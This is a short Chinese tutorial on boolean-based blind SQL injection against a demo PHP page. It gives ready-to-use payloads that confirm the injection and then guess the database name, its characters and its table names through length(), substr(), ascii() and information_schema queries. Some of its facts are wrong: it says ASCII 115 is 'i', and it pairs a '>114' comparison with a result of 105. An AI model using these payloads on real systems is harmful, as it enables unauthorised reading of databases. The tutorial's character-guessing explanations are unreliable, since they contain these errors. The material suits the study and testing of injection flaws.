盲注是注入的一种方式,是在页面只返回true和false时使用。
需要准备PHP知识
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
以上每个函数都可使用,但有可能被禁用,可选其他函数测试
一、判断是否存在盲注
可能需要闭合及注释操作,此处未演示
03.php?id=1 and 1=1
正常显示
03.php?id=1 and 1=2
什么都不显示,也不返回报错
此时存在盲注
二、进行范围测试
有布尔盲注页面只返回true及false两种页面,只能通过PHP函数猜解
1.一一猜解数据库名长度
03.php?id=1 and (length(database()))>10
当前数据库database()的长度大于10,返回true页面,否则FALSE页面。
2.猜当前数据库第一个字母的ASCII值
03.php?id=1 and ascii(substr(database(),1,1))>114
用substr函数截取database数据库第一字母1长度的数据比较出ASCII值为105,为i。修改substr(database(),2,1)可猜第二个字母,之后按字符长度逐个猜出.这条语句在后台为:
SELECT * FROM iweb WHERE id=1 and ascii(substr(database(),1,1))>114
此为无需闭合语句演示
3.猜出当前数据库的表名的第一个字母的ASCII值
用substr函数截取并用select查询database数据库中表名(0偏移量,第1行的表名)第一字母1长度的数据比较出ASCII值为115,为i。修改substr(~~~~,2,1)可猜第二个字母,之后按字符长度逐个猜出
03.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>114
4.猜出所选表下的所有字段
5.猜出所选字段下的数据
盲注用手工注入太费时,需配合工具使用,如kali、脚本,此为命令演示